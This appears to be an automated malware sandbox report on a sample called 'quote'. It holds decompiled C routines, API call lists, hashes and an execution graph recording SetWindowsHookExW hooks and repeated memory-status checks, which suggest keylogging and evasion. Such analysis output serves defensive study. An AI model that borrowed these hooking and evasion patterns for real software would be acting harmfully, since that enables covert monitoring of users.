                                                                                      						_t42 = 2;
                                                                                      						_t54 = _t52 + _t42;
                                                                                      						_t61 = _t19 - 0x6c;
                                                                                      						if(_t61 > 0) {
                                                                                      							_t20 = _t19 - 0x70;
                                                                                      							if(_t20 == 0) {
                                                                                      								L12:
                                                                                      								_t52 = _t54 + _t42;
                                                                                      								_t24 = E6F491272(E6F4912BA(( *_t54 & 0x0000ffff) - 0x30));
                                                                                      								L13:
                                                                                      								GlobalFree(_t24);
                                                                                      								goto L14;
                                                                                      							}
                                                                                      							_t26 = _t20 - _t42;
                                                                                      							if(_t26 == 0) {
                                                                                      								L10:
                                                                                      								_t52 =  &(_t54[1]);
                                                                                      								_t24 = E6F4912E1(( *_t54 & 0x0000ffff) - 0x30, E6F491243());
                                                                                      								goto L13;
                                                                                      							}
                                                                                      							L7:
                                                                                      							if(_t26 == 1) {
                                                                                      								_t30 = GlobalAlloc(0x40, _t41 + 4);
                                                                                      								 *_t30 =  *0x6f495040;
                                                                                      								 *0x6f495040 = _t30;
                                                                                      								E6F491563(_t30 + 4,  *0x6f495074, _t41);
                                                                                      								_t59 = _t59 + 0xc;
                                                                                      							}
                                                                                      							goto L14;
                                                                                      						}
                                                                                      						if(_t61 == 0) {
                                                                                      							L17:
                                                                                      							_t33 =  *0x6f495040;
                                                                                      							if( *0x6f495040 != 0) {
                                                                                      								E6F491563( *0x6f495074, _t33 + 4, _t41);
                                                                                      								_t59 = _t59 + 0xc;
                                                                                      								_t36 =  *0x6f495040;
                                                                                      								GlobalFree(_t36);
                                                                                      								 *0x6f495040 =  *_t36;
                                                                                      							}
                                                                                      							goto L14;
                                                                                      						}
                                                                                      						_t38 = _t19 - 0x4c;
                                                                                      						if(_t38 == 0) {
                                                                                      							goto L17;
                                                                                      						}
                                                                                      						_t39 = _t38 - 4;
                                                                                      						if(_t39 == 0) {
                                                                                      							 *_t54 =  *_t54 + 0xa;
                                                                                      							goto L12;
                                                                                      						}
                                                                                      						_t26 = _t39 - _t42;
                                                                                      						if(_t26 == 0) {
                                                                                      							 *_t54 =  *_t54 + 0xa;
                                                                                      							goto L10;
                                                                                      						}
                                                                                      						goto L7;
                                                                                      						L14:
                                                                                      					} while ( *_t52 != 0);
                                                                                      					_t17 = _v0;
                                                                                      					goto L16;
                                                                                      				}
                                                                                      			}





















                                                                                      0x6f4910e6
                                                                                      0x6f4910f0
                                                                                      0x6f4910ff
                                                                                      0x6f49110e
                                                                                      0x6f491119
                                                                                      0x6f49111c
                                                                                      0x6f49112b
                                                                                      0x6f49112f
                                                                                      0x6f491131
                                                                                      0x6f4911d8
                                                                                      0x6f4911de
                                                                                      0x6f491137
                                                                                      0x6f491138
                                                                                      0x6f491138
                                                                                      0x6f49113d
                                                                                      0x6f49113e
                                                                                      0x6f491140
                                                                                      0x6f491143
                                                                                      0x6f49120d
                                                                                      0x6f491210
                                                                                      0x6f4911b0
                                                                                      0x6f4911b6
                                                                                      0x6f4911bf
                                                                                      0x6f4911c4
                                                                                      0x6f4911c7
                                                                                      0x00000000
                                                                                      0x6f4911c7
                                                                                      0x6f491212
                                                                                      0x6f491214
                                                                                      0x6f491196
                                                                                      0x6f49119d
                                                                                      0x6f4911a5
                                                                                      0x00000000
                                                                                      0x6f4911a5
                                                                                      0x6f491161
                                                                                      0x6f491162
                                                                                      0x6f49116a
                                                                                      0x6f491177
                                                                                      0x6f49117f
                                                                                      0x6f491188
                                                                                      0x6f49118d
                                                                                      0x6f49118d
                                                                                      0x00000000
                                                                                      0x6f491162
                                                                                      0x6f491149
                                                                                      0x6f4911df
                                                                                      0x6f4911df
                                                                                      0x6f4911e6
                                                                                      0x6f4911f3
                                                                                      0x6f4911f8
                                                                                      0x6f4911fb
                                                                                      0x6f491203
                                                                                      0x6f491205
                                                                                      0x6f491205
                                                                                      0x00000000
                                                                                      0x6f4911e6
                                                                                      0x6f49114f
                                                                                      0x6f491152
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491158
                                                                                      0x6f49115b
                                                                                      0x6f4911ac
                                                                                      0x00000000
                                                                                      0x6f4911ac
                                                                                      0x6f49115d
                                                                                      0x6f49115f
                                                                                      0x6f491192
                                                                                      0x00000000
                                                                                      0x6f491192
                                                                                      0x00000000
                                                                                      0x6f4911c9
                                                                                      0x6f4911c9
                                                                                      0x6f4911d3
                                                                                      0x00000000
                                                                                      0x6f4911d7

                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 6F49116A
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F4911C7
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F4911D9
                                                                                      • GlobalFree.KERNEL32(?), ref: 6F491203
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1343531538.000000006F491000.00000020.00000001.01000000.00000006.sdmp, Offset: 6F490000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1343473966.000000006F490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1343609504.000000006F494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1343646469.000000006F496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6f490000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: 53e1cdff49147d85511a7cb1abee1826cdc30673fb0c614ab85a2bea777ab15a
                                                                                      • Instruction ID: a63ae2b73c977cc0c49c151e6015062f11ac59ac3d9d60577f526a4d367f26cc
                                                                                      • Opcode Fuzzy Hash: 53e1cdff49147d85511a7cb1abee1826cdc30673fb0c614ab85a2bea777ab15a
                                                                                      • Instruction Fuzzy Hash: EF3165B5700205AFEB00EF78D946D697FECEB9A361710461AE844E7E54E735E811C7A0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405E6C(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                      				int _v8;
                                                                                      				int _t12;
                                                                                      				int _t14;
                                                                                      				int _t15;
                                                                                      				CHAR* _t17;
                                                                                      				CHAR* _t27;
                                                                                      
                                                                                      				_t12 = lstrlenA(_a8);
                                                                                      				_t27 = _a4;
                                                                                      				_v8 = _t12;
                                                                                      				while(lstrlenA(_t27) >= _v8) {
                                                                                      					_t14 = _v8;
                                                                                      					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                      					_t15 = lstrcmpiA(_t27, _a8);
                                                                                      					_t27[_v8] =  *(_t14 + _t27);
                                                                                      					if(_t15 == 0) {
                                                                                      						_t17 = _t27;
                                                                                      					} else {
                                                                                      						_t27 = CharNextA(_t27);
                                                                                      						continue;
                                                                                      					}
                                                                                      					L5:
                                                                                      					return _t17;
                                                                                      				}
                                                                                      				_t17 = 0;
                                                                                      				goto L5;
                                                                                      			}









                                                                                      0x00405e7c
                                                                                      0x00405e7e
                                                                                      0x00405e81
                                                                                      0x00405ead
                                                                                      0x00405e86
                                                                                      0x00405e8f
                                                                                      0x00405e94
                                                                                      0x00405e9f
                                                                                      0x00405ea2
                                                                                      0x00405ebe
                                                                                      0x00405ea4
                                                                                      0x00405eab
                                                                                      0x00000000
                                                                                      0x00405eab
                                                                                      0x00405eb7
                                                                                      0x00405ebb
                                                                                      0x00405ebb
                                                                                      0x00405eb5
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E94
                                                                                      • CharNextA.USER32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EA5
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EAE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                      • Instruction ID: 346f7042b660fb70b52ae74c1c6e121eab6bc84344666f805f11c7930e864ff2
                                                                                      • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                      • Instruction Fuzzy Hash: A8F06231505418FFD7029BA5DE0099FBBA8EF56250B2540AAE880F7250D674EF019BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:21.2%
                                                                                      Dynamic/Decrypted Code Coverage:99.7%
                                                                                      Signature Coverage:0.7%
                                                                                      Total number of Nodes:676
                                                                                      Total number of Limit Nodes:35
                                                                                      execution_graph 49883 20893cc8 49884 20893cdb 49883->49884 49887 20893820 49884->49887 49886 20893ce6 49888 2089382b 49887->49888 49889 20893d2a 49888->49889 49892 20894c7b 49888->49892 49902 20894c90 49888->49902 49889->49886 49893 20894c90 49892->49893 49912 208951f1 49893->49912 49894 20894d3e 49895 20894004 GetModuleHandleW 49894->49895 49897 20894d6a 49894->49897 49896 20894dae 49895->49896 49898 20896708 CreateWindowExW 49896->49898 49899 2089674e CreateWindowExW CreateWindowExW 49896->49899 49900 20896701 CreateWindowExW 49896->49900 49898->49897 49899->49897 49900->49897 49903 20894cbb 49902->49903 49911 208951f1 GetModuleHandleW 49903->49911 49904 20894d3e 49905 20894d6a 49904->49905 49906 20894004 GetModuleHandleW 49904->49906 49905->49905 49907 20894dae 49906->49907 49941 20896701 49907->49941 49944 2089674e 49907->49944 49954 20896708 49907->49954 49911->49904 49913 2089522d 49912->49913 49914 208952ae 49913->49914 49917 20895370 49913->49917 49927 20895362 49913->49927 49918 20895385 49917->49918 49921 208953a9 49918->49921 49937 20894004 49918->49937 49920 20895574 49920->49914 49921->49920 49922 20894004 GetModuleHandleW 49921->49922 49923 208954fa 49922->49923 49923->49920 49924 20894004 GetModuleHandleW 49923->49924 49925 20895548 49924->49925 49925->49920 49926 20894004 GetModuleHandleW 49925->49926 49926->49920 49928 20895385 49927->49928 49929 20894004 GetModuleHandleW 49928->49929 49930 208953a9 49928->49930 49929->49930 49931 20894004 GetModuleHandleW 49930->49931 49936 20895574 49930->49936 49932 208954fa 49931->49932 49933 20894004 GetModuleHandleW 49932->49933 49932->49936 49934 20895548 49933->49934 49935 20894004 GetModuleHandleW 49934->49935 49934->49936 49935->49936 49936->49914 49938 208956b0 GetModuleHandleW 49937->49938 49940 20895725 49938->49940 49940->49921 49942 2089673d 49941->49942 49957 20894114 49941->49957 49942->49905 49945 20896752 CreateWindowExW 49944->49945 49946 2089671c 49944->49946 49951 2089687c 49945->49951 49947 20894114 CreateWindowExW 49946->49947 49949 20896739 49947->49949 49950 2089673d 49949->49950 49952 2089674e CreateWindowExW 49949->49952 49953 20894114 CreateWindowExW 49949->49953 49950->49905 49952->49950 49953->49950 49955 20894114 CreateWindowExW 49954->49955 49956 2089673d 49955->49956 49956->49905 49958 20896758 CreateWindowExW 49957->49958 49960 2089687c 49958->49960 49960->49960 49961 2089c3c8 49962 2089c3d3 49961->49962 49963 2089c3e3 49962->49963 49965 2089be68 49962->49965 49966 2089c418 OleInitialize 49965->49966 49967 2089c47c 49966->49967 49967->49963 50663 2089ba38 50664 2089ba48 50663->50664 50667 2089a36c 50664->50667 50668 2089ba88 KiUserCallbackDispatcher 50667->50668 50670 2089ba4f 50668->50670 50671 2089a558 50672 2089a59e 50671->50672 50676 2089a728 50672->50676 50679 2089a738 50672->50679 50673 2089a68b 50682 2089a104 50676->50682 50680 2089a766 50679->50680 50681 2089a104 DuplicateHandle 50679->50681 50680->50673 50681->50680 50683 2089a7a0 DuplicateHandle 50682->50683 50684 2089a766 50683->50684 50684->50673 49968 1d720c50 49969 1d720c5d 49968->49969 49975 1d72d2d8 49969->49975 49984 1d72d3cd 49969->49984 49991 1d72d2c9 49969->49991 50000 1d72d329 49969->50000 49974 1d720c6f 49976 1d72d2e0 49975->49976 50009 1d72d9d8 49976->50009 50015 1d72d9c9 49976->50015 50021 1d72dae8 49976->50021 49977 1d72d3cb 49978 1d72d502 49977->49978 50028 2089e2c1 49977->50028 50032 2089e2d0 49977->50032 49978->49974 49985 1d72d3d4 49984->49985 49986 1d72d2d8 17 API calls 49985->49986 49987 1d72d3d9 49986->49987 49988 1d72d502 49987->49988 49989 2089e2c1 SetWindowsHookExW 49987->49989 49990 2089e2d0 SetWindowsHookExW 49987->49990 49988->49974 49989->49988 49990->49988 49992 1d72d2e0 49991->49992 49995 1d72d9d8 17 API calls 49992->49995 49996 1d72dae8 17 API calls 49992->49996 49997 1d72d9c9 17 API calls 49992->49997 49993 1d72d502 49993->49974 49994 1d72d3cb 49994->49993 49998 2089e2c1 SetWindowsHookExW 49994->49998 49999 2089e2d0 SetWindowsHookExW 49994->49999 49995->49994 49996->49994 49997->49994 49998->49993 49999->49993 50001 1d72d2e0 50000->50001 50001->50000 50006 1d72d9d8 17 API calls 50001->50006 50007 1d72dae8 17 API calls 50001->50007 50008 1d72d9c9 17 API calls 50001->50008 50002 1d72d3cb 50003 1d72d502 50002->50003 50004 2089e2c1 SetWindowsHookExW 50002->50004 50005 2089e2d0 SetWindowsHookExW 50002->50005 50003->49974 50004->50003 50005->50003 50006->50002 50007->50002 50008->50002 50011 1d72d9e1 50009->50011 50010 1d72dae1 50010->49977 50011->50010 50036 1d72de44 50011->50036 50044 1d72dc19 50011->50044 50095 1d72dc28 50011->50095 50016 1d72d9d0 50015->50016 50017 1d72dae1 50016->50017 50018 1d72de44 2 API calls 50016->50018 50019 1d72dc28 17 API calls 50016->50019 50020 1d72dc19 17 API calls 50016->50020 50017->49977 50018->50016 50019->50016 50020->50016 50022 1d72daf6 50021->50022 50024 1d72d9e1 50021->50024 50023 1d72dae1 50023->49977 50024->50023 50025 1d72de44 2 API calls 50024->50025 50026 1d72dc28 17 API calls 50024->50026 50027 1d72dc19 17 API calls 50024->50027 50025->50024 50026->50024 50027->50024 50029 2089e2d0 50028->50029 50031 2089e32e 50029->50031 50550 2089d110 50029->50550 50031->49978 50033 2089e2ea 50032->50033 50034 2089d110 SetWindowsHookExW 50033->50034 50035 2089e32e 50033->50035 50034->50033 50035->49978 50037 1d72ddfd 50036->50037 50038 1d72de06 50037->50038 50146 20890bc0 50037->50146 50153 20890bb2 50037->50153 50038->50011 50039 1d72df7b 50160 208923c8 50039->50160 50169 208923c2 50039->50169 50045 1d72dc47 50044->50045 50046 1d72dc6f 50045->50046 50213 1d72f476 50045->50213 50220 1d72ee70 50045->50220 50229 1d72f98d 50045->50229 50233 1d72f086 50045->50233 50240 1d72ed80 50045->50240 50247 1d72f503 50045->50247 50254 1d72f19a 50045->50254 50261 1d72f795 50045->50261 50265 1d72fa11 50045->50265 50269 1d72f110 50045->50269 50276 1d72f593 50045->50276 50283 1d72ee2b 50045->50283 50292 1d72f2a5 50045->50292 50299 1d72f825 50045->50299 50303 1d72f224 50045->50303 50310 1d72f326 50045->50310 50317 1d72eda1 50045->50317 50326 1d72f623 50045->50326 50333 1d72ef3f 50045->50333 50342 1d72f4bb 50045->50342 50349 1d72eeb5 50045->50349 50358 1d72f8b5 50045->50358 50362 1d72f737 50045->50362 50369 1d72f431 50045->50369 50376 1d72f3b0 50045->50376 50383 1d72f6b3 50045->50383 50390 1d72f9c9 50045->50390 50394 1d72f0cb 50045->50394 50401 1d72f54b 50045->50401 50408 1d72f945 50045->50408 50412 1d72f041 50045->50412 50421 1d72efc0 50045->50421 50430 1d72f7dd 50045->50430 50434 1d72f1df 50045->50434 50441 1d72f5db 50045->50441 50448 1d72f155 50045->50448 50455 1d72f86d 50045->50455 50459 1d72f6ef 50045->50459 50466 1d72f269 50045->50466 50473 1d72f36b 50045->50473 50480 1d72f66b 50045->50480 50487 1d72ede6 50045->50487 50496 1d72f2e1 50045->50496 50503 1d72f8fd 50045->50503 50507 1d72effc 50045->50507 50516 1d72ef7b 50045->50516 50525 1d72eefa 50045->50525 50534 1d72f3f5 50045->50534 50096 1d72dc47 50095->50096 50097 1d72dc6f 50096->50097 50098 1d72ee70 17 API calls 50096->50098 50099 1d72f476 17 API calls 50096->50099 50100 1d72f3f5 17 API calls 50096->50100 50101 1d72eefa 17 API calls 50096->50101 50102 1d72ef7b 17 API calls 50096->50102 50103 1d72effc 17 API calls 50096->50103 50104 1d72f8fd 17 API calls 50096->50104 50105 1d72f2e1 17 API calls 50096->50105 50106 1d72ede6 17 API calls 50096->50106 50107 1d72f66b 17 API calls 50096->50107 50108 1d72f36b 17 API calls 50096->50108 50109 1d72f269 17 API calls 50096->50109 50110 1d72f6ef 17 API calls 50096->50110 50111 1d72f86d 17 API calls 50096->50111 50112 1d72f155 17 API calls 50096->50112 50113 1d72f5db 17 API calls 50096->50113 50114 1d72f1df 17 API calls 50096->50114 50115 1d72f7dd 17 API calls 50096->50115 50116 1d72efc0 17 API calls 50096->50116 50117 1d72f041 17 API calls 50096->50117 50118 1d72f945 17 API calls 50096->50118 50119 1d72f54b 17 API calls 50096->50119 50120 1d72f0cb 17 API calls 50096->50120 50121 1d72f9c9 17 API calls 50096->50121 50122 1d72f6b3 17 API calls 50096->50122 50123 1d72f3b0 17 API calls 50096->50123 50124 1d72f431 17 API calls 50096->50124 50125 1d72f737 17 API calls 50096->50125 50126 1d72f8b5 17 API calls 50096->50126 50127 1d72eeb5 17 API calls 50096->50127 50128 1d72f4bb 17 API calls 50096->50128 50129 1d72ef3f 17 API calls 50096->50129 50130 1d72f623 17 API calls 50096->50130 50131 1d72eda1 17 API calls 50096->50131 50132 1d72f326 17 API calls 50096->50132 50133 1d72f224 17 API calls 50096->50133 50134 1d72f825 17 API calls 50096->50134 50135 1d72f2a5 17 API calls 50096->50135 50136 1d72ee2b 17 API calls 50096->50136 50137 1d72f593 17 API calls 50096->50137 50138 1d72f110 17 API calls 50096->50138 50139 1d72fa11 17 API calls 50096->50139 50140 1d72f795 17 API calls 50096->50140 50141 1d72f19a 17 API calls 50096->50141 50142 1d72f503 17 API calls 50096->50142 50143 1d72ed80 3 API calls 50096->50143 50144 1d72f086 17 API calls 50096->50144 50145 1d72f98d 17 API calls 50096->50145 50098->50097 50099->50097 50100->50097 50101->50097 50102->50097 50103->50097 50104->50097 50105->50097 50106->50097 50107->50097 50108->50097 50109->50097 50110->50097 50111->50097 50112->50097 50113->50097 50114->50097 50115->50097 50116->50097 50117->50097 50118->50097 50119->50097 50120->50097 50121->50097 50122->50097 50123->50097 50124->50097 50125->50097 50126->50097 50127->50097 50128->50097 50129->50097 50130->50097 50131->50097 50132->50097 50133->50097 50134->50097 50135->50097 50136->50097 50137->50097 50138->50097 50139->50097 50140->50097 50141->50097 50142->50097 50143->50097 50144->50097 50145->50097 50148 20890bd5 50146->50148 50147 20890eb4 50147->50039 50148->50147 50149 208911f8 GlobalMemoryStatusEx GlobalMemoryStatusEx 50148->50149 50150 20891208 GlobalMemoryStatusEx GlobalMemoryStatusEx 50148->50150 50151 20891258 GlobalMemoryStatusEx GlobalMemoryStatusEx 50148->50151 50178 20891373 50148->50178 50149->50148 50150->50148 50151->50148 50155 20890bd5 50153->50155 50154 20890eb4 50154->50039 50155->50154 50156 208911f8 GlobalMemoryStatusEx GlobalMemoryStatusEx 50155->50156 50157 20891373 2 API calls 50155->50157 50158 20891208 GlobalMemoryStatusEx GlobalMemoryStatusEx 50155->50158 50159 20891258 GlobalMemoryStatusEx GlobalMemoryStatusEx 50155->50159 50156->50155 50157->50155 50158->50155 50159->50155 50161 208923d9 50160->50161 50162 208923fc 50160->50162 50161->50038 50204 20891208 50162->50204 50164 2089257d 50209 20891258 50164->50209 50166 2089259e 50167 20891258 2 API calls 50166->50167 50168 208925de 50167->50168 50168->50038 50170 208923d9 50169->50170 50171 208923fc 50169->50171 50170->50038 50172 20891208 2 API calls 50171->50172 50173 2089257d 50172->50173 50174 20891258 2 API calls 50173->50174 50175 2089259e 50174->50175 50176 20891258 2 API calls 50175->50176 50177 208925de 50176->50177 50177->50038 50180 20891374 50178->50180 50179 208913b6 50179->50148 50180->50179 50182 2089155f 50180->50182 50186 20891598 50182->50186 50192 208915a8 50182->50192 50183 2089157e 50183->50179 50187 208915a8 50186->50187 50188 208915b5 50187->50188 50198 20891a88 50187->50198 50201 20891a81 50187->50201 50188->50183 50189 208915fa 50189->50183 50193 208915dd 50192->50193 50194 208915b5 50192->50194 50196 20891a88 GlobalMemoryStatusEx 50193->50196 50197 20891a81 GlobalMemoryStatusEx 50193->50197 50194->50183 50195 208915fa 50195->50183 50196->50195 50197->50195 50199 20891ace GlobalMemoryStatusEx 50198->50199 50200 20891afe 50199->50200 50200->50189 50202 20891ace GlobalMemoryStatusEx 50201->50202 50203 20891afe 50202->50203 50203->50189 50205 20891219 50204->50205 50206 2089123c 50204->50206 50205->50164 50207 208912b7 50206->50207 50208 2089155f 2 API calls 50206->50208 50207->50164 50208->50207 50210 2089127d 50209->50210 50211 2089155f 2 API calls 50210->50211 50212 208912b7 50210->50212 50211->50212 50212->50166 50214 1d72f487 50213->50214 50215 1d72d2d8 17 API calls 50214->50215 50216 1d72f495 50215->50216 50541 208b1a70 50216->50541 50545 208b1a10 50216->50545 50217 1d72f764 50217->50046 50221 1d72ee81 50220->50221 50222 1d72d2d8 16 API calls 50221->50222 50223 1d72ee8f KiUserExceptionDispatcher 50222->50223 50225 1d72f084 50223->50225 50227 208b1a10 LdrInitializeThunk 50225->50227 50228 208b1a70 LdrInitializeThunk 50225->50228 50226 1d72f764 50226->50046 50227->50226 50228->50226 50230 1d72f99e 50229->50230 50231 1d72d2d8 17 API calls 50230->50231 50232 1d72f9a3 50231->50232 50232->50046 50234 1d72f097 50233->50234 50235 1d72d2d8 17 API calls 50234->50235 50236 1d72f0a5 50235->50236 50238 208b1a10 LdrInitializeThunk 50236->50238 50239 208b1a70 LdrInitializeThunk 50236->50239 50237 1d72f764 50237->50046 50238->50237 50239->50237 50241 1d72ed86 50240->50241 50242 1d72f065 KiUserExceptionDispatcher 50241->50242 50243 1d72f084 50242->50243 50245 208b1a10 LdrInitializeThunk 50243->50245 50246 208b1a70 LdrInitializeThunk 50243->50246 50244 1d72f764 50244->50046 50245->50244 50246->50244 50248 1d72f514 50247->50248 50249 1d72d2d8 17 API calls 50248->50249 50250 1d72f525 50249->50250 50252 208b1a10 LdrInitializeThunk 50250->50252 50253 208b1a70 LdrInitializeThunk 50250->50253 50251 1d72f764 50251->50046 50252->50251 50253->50251 50255 1d72f1ab 50254->50255 50256 1d72d2d8 17 API calls 50255->50256 50257 1d72f1b9 50256->50257 50259 208b1a10 LdrInitializeThunk 50257->50259 50260 208b1a70 LdrInitializeThunk 50257->50260 50258 1d72f764 50258->50046 50259->50258 50260->50258 50262 1d72f7a6 50261->50262 50263 1d72d2d8 17 API calls 50262->50263 50264 1d72f7b7 50263->50264 50264->50046 50266 1d72fa22 50265->50266 50267 1d72d2d8 17 API calls 50266->50267 50268 1d72fa33 50267->50268 50268->50046 50270 1d72f121 50269->50270 50271 1d72d2d8 17 API calls 50270->50271 50272 1d72f12f 50271->50272 50274 208b1a10 LdrInitializeThunk 50272->50274 50275 208b1a70 LdrInitializeThunk 50272->50275 50273 1d72f764 50273->50046 50274->50273 50275->50273 50277 1d72f5a4 50276->50277 50278 1d72d2d8 17 API calls 50277->50278 50279 1d72f5b5 50278->50279 50281 208b1a10 LdrInitializeThunk 50279->50281 50282 208b1a70 LdrInitializeThunk 50279->50282 50280 1d72f764 50280->50046 50281->50280 50282->50280 50284 1d72ee3c 50283->50284 50285 1d72d2d8 16 API calls 50284->50285 50286 1d72ee4a 50285->50286 50287 1d72f065 KiUserExceptionDispatcher 50286->50287 50288 1d72f084 50287->50288 50290 208b1a10 LdrInitializeThunk 50288->50290 50291 208b1a70 LdrInitializeThunk 50288->50291 50289 1d72f764 50289->50046 50290->50289 50291->50289 50293 1d72f2b6 50292->50293 50294 1d72d2d8 17 API calls 50293->50294 50295 1d72f2bb 50294->50295 50297 208b1a10 LdrInitializeThunk 50295->50297 50298 208b1a70 LdrInitializeThunk 50295->50298 50296 1d72f764 50296->50046 50297->50296 50298->50296 50300 1d72f836 50299->50300 50301 1d72d2d8 17 API calls 50300->50301 50302 1d72f847 50301->50302 50302->50046 50304 1d72f235 50303->50304 50305 1d72d2d8 17 API calls 50304->50305 50306 1d72f243 50305->50306 50308 208b1a10 LdrInitializeThunk 50306->50308 50309 208b1a70 LdrInitializeThunk 50306->50309 50307 1d72f764 50307->50046 50308->50307 50309->50307 50311 1d72f337 50310->50311 50312 1d72d2d8 17 API calls 50311->50312 50313 1d72f345 50312->50313 50315 208b1a10 LdrInitializeThunk 50313->50315 50316 208b1a70 LdrInitializeThunk 50313->50316 50314 1d72f764 50314->50046 50315->50314 50316->50314 50318 1d72edb2 50317->50318 50319 1d72d2d8 16 API calls 50318->50319 50320 1d72edc0 50319->50320 50321 1d72f065 KiUserExceptionDispatcher 50320->50321 50322 1d72f084 50321->50322 50324 208b1a10 LdrInitializeThunk 50322->50324 50325 208b1a70 LdrInitializeThunk 50322->50325 50323 1d72f764 50323->50046 50324->50323 50325->50323 50327 1d72f634 50326->50327 50328 1d72d2d8 17 API calls 50327->50328 50329 1d72f645 50328->50329 50331 208b1a10 LdrInitializeThunk 50329->50331 50332 208b1a70 LdrInitializeThunk 50329->50332 50330 1d72f764 50330->50046 50331->50330 50332->50330 50334 1d72ef50 50333->50334 50335 1d72d2d8 16 API calls 50334->50335 50336 1d72ef55 KiUserExceptionDispatcher 50335->50336 50338 1d72f084 50336->50338 50340 208b1a10 LdrInitializeThunk 50338->50340 50341 208b1a70 LdrInitializeThunk 50338->50341 50339 1d72f764 50339->50046 50340->50339 50341->50339 50343 1d72f4cc 50342->50343 50344 1d72d2d8 17 API calls 50343->50344 50346 1d72f4dd 50344->50346 50345 1d72f764 50345->50046 50347 208b1a10 LdrInitializeThunk 50346->50347 50348 208b1a70 LdrInitializeThunk 50346->50348 50347->50345 50348->50345 50350 1d72eec6 50349->50350 50351 1d72d2d8 16 API calls 50350->50351 50352 1d72eed4 KiUserExceptionDispatcher 50351->50352 50354 1d72f084 50352->50354 50356 208b1a10 LdrInitializeThunk 50354->50356 50357 208b1a70 LdrInitializeThunk 50354->50357 50355 1d72f764 50355->50046 50356->50355 50357->50355 50359 1d72f8c6 50358->50359 50360 1d72d2d8 17 API calls 50359->50360 50361 1d72f8d7 50360->50361 50361->50046 50363 1d72f748 50362->50363 50364 1d72d2d8 17 API calls 50363->50364 50365 1d72f759 50364->50365 50367 208b1a10 LdrInitializeThunk 50365->50367 50368 208b1a70 LdrInitializeThunk 50365->50368 50366 1d72f764 50366->50046 50367->50366 50368->50366 50370 1d72f442 50369->50370 50371 1d72d2d8 17 API calls 50370->50371 50372 1d72f450 50371->50372 50374 208b1a10 LdrInitializeThunk 50372->50374 50375 208b1a70 LdrInitializeThunk 50372->50375 50373 1d72f764 50373->50046 50374->50373 50375->50373 50377 1d72f3c1 50376->50377 50378 1d72d2d8 17 API calls 50377->50378 50379 1d72f3cf 50378->50379 50381 208b1a10 LdrInitializeThunk 50379->50381 50382 208b1a70 LdrInitializeThunk 50379->50382 50380 1d72f764 50380->50046 50381->50380 50382->50380 50384 1d72f6c4 50383->50384 50385 1d72d2d8 17 API calls 50384->50385 50386 1d72f6c9 50385->50386 50388 208b1a10 LdrInitializeThunk 50386->50388 50389 208b1a70 LdrInitializeThunk 50386->50389 50387 1d72f764 50387->50046 50388->50387 50389->50387 50391 1d72f9da 50390->50391 50392 1d72d2d8 17 API calls 50391->50392 50393 1d72f9eb 50392->50393 50393->50046 50395 1d72f0dc 50394->50395 50396 1d72d2d8 17 API calls 50395->50396 50397 1d72f0ea 50396->50397 50399 208b1a10 LdrInitializeThunk 50397->50399 50400 208b1a70 LdrInitializeThunk 50397->50400 50398 1d72f764 50398->50046 50399->50398 50400->50398 50402 1d72f55c 50401->50402 50403 1d72d2d8 17 API calls 50402->50403 50404 1d72f56d 50403->50404 50406 208b1a10 LdrInitializeThunk 50404->50406 50407 208b1a70 LdrInitializeThunk 